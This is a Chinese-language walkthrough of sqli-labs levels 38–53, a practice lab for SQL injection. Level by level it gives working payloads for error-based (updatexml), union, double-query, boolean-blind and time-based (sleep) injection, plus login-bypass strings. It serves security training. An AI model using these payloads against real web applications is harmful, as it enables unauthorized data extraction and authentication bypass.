sqli-labs-master 38-53 Stacked-Injections
其他关卡和靶场看专栏…
文章目录
- sqli-labs-master 38-53 Stacked-Injections
- 第三十八关-报错注入
- 第三十九关-报错注入
- 第四十关-盲注
- 第四十一关-盲注
- 第四十二关-联合报错双查询注入
- 第四十三关-报错注入
- 第四十四关-盲注
- 第四十五关-盲注
- 第四十六关-报错注入
- 第四十七关-报错注入
- 第四十八关-时间盲注
- 第四十九关-时间盲注
- 第五十关-报错注入
- 第五十一关-报错注入
- 第五十二关-时间盲注
- 第五十三关-时间盲注
- 总结
第三十八关-报错注入
?id=1'
?id=1' and '1'='1
通过上述语句可以判断这是单引号闭合,根据报错信息可以试一下报错注入:
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) -- #
第三十九关-报错注入
?id=2-1
通过上述语句回显1的信息可以初步判断这是数字型注入,根据报错信息可以尝试报错注入
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)
第四十关-盲注
?id=1'
?id=1' and '1'='1
?id=1' and '1'='2
?id=1' and length(database())=8 and '1'='1
对于第一个语句页面没有回显错误信息,所以假设为单引号闭合试一下第二个和第三个发现页面仅仅有显示和不显示,所以使用盲注
第四十一关-盲注
?id=2-1
?id=2 and 1=1
第一段语句回显1的信息,第二段回显2的信息,得知这是字符型注入,没有报错信息,所以试一下盲注:
?id=1 and length(database())=8
第四十二关-联合报错双查询注入
对账号密码分别进行单引号探针发现,仅仅password部分有报错,根据报错信息得知这是单引号闭合,尝试union注入:
login_user=1&login_password=1' order by 3#&mysubmit=Login
login_user=1&login_password=1' order by 4#&mysubmit=Login
login_user=1&login_password=1' union select 1,database(),3#&mysubmit=Login
login_user=1&login_password=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3#&mysubmit=Login
同样也可以进行双查询注入:
login_user=1&login_password=1' union select 1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x3a,floor(rand(14)*2)) as a,count(*) from information_schema.columns group by a#&mysubmit=Login
也可以直接updatexml报错注入:
login_user=1&login_password=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)#&mysubmit=Login
第四十三关-报错注入
对账号密码进行引号探针发现仅仅password部分显示报错信息,根据报错信息可以知道这是单引号加上括号闭合:
尝试报错注入,报错内容正常回显:
login_user=1&login_password=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)#&mysubmit=Login
第四十四关-盲注
login_user=1&login_password=1' or '1'='1&mysubmit=Login
在对账号和密码添加引号时候发现没有任何报错,所以有可能print_r(mysqli_error())被注释了。尝试or,发现成功登录:
所以判断这是单引号闭合,由于没有报错信息所以尝试Union注入。输入order by判断字段数时候,发现原来应有的报错信息变成了登录失败,order by 3以内为成功,4及以上为登录失败,所以union select 1,2,3判断回显位,发现没有回显位,所以只能进行盲注:
login_user=1&login_password=1' or length(database())=8 -- #&mysubmit=Login
第四十五关-盲注
login_user=1&login_password=1' or '1'='1&mysubmit=Login
login_user=1&login_password=1" or "1"="1&mysubmit=Login
通过上述语句并没有得到任何的报错信息,所以猜测存在括号:
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
查看源代码发现确实存在括号,所以构造闭合,成功登录:
login_user=1&login_password=1') or ('1'='1&mysubmit=Login
由于没有报错信息所以使用盲注:
login_user=1&login_password=1') or length(database())=8 -- #&mysubmit=Login
第四十六关-报错注入
查看源代码发现order by关键字,这个关键字的作用就是针对第几列进行升序排序
$sql = "SELECT * FROM users ORDER BY $id";
对参数值进行探针,发现order by后面是可以添加语句的,添加引号发现存在报错信息,所以尝试报错注入:
?sort=3 and sleep(3)
?sort=4 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)
第四十七关-报错注入
添加引号之后回显报错信息,可知这是单引号闭合,并且可以尝试报错注入
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) -- #
第四十八关-时间盲注
添加单引号之后发现没有返回排序信息,并且没有报错信息,所以猜测报错函数被注释了,故尝试盲注。使用2-1发现和1的效果是一样的,所以判断是数字型注入
?sort=1 and if(length(database())=8,sleep(2),1)
这一道题使用不了布尔盲注,因为sort的值仅仅是order by的值而不是where条件值。
第四十九关-时间盲注
使用单引号探针没有回显报错信息,所以猜测报错函数被注释了,所以尝试:
?sort=1' -- #
页面正常显示,所以判断这是单引号闭合,由于报错函数被注释所以使用盲注:
?sort=1' and if(length(database())=8,sleep(1),1) -- #
第五十关-报错注入
单引号探针显示报错信息,所以判断这是数字型注入,且可以尝试报错注入:
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)
第五十一关-报错注入
好简单:
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) -- #
第五十二关-时间盲注
引号探针没有回显任何信息,使用1’ and ‘1’='1并没有正常显示,使用2-1回显1的信息,所以判断是数字型注入,由于没有报错信息,所以使用时间盲注:
?sort=1 and if(length(database())=8,sleep(1),1)
第五十三关-时间盲注
服了,后面为什么这么简单…加上单引号没有东西显示,所以我们尝试闭合并使用时间盲注:
?sort=1' and sleep(3) -- #
有延时,所以存在时间盲注。
总结
后面的真的好简单,没啥好总结的,做了这么多题发现这一部分没啥好看的。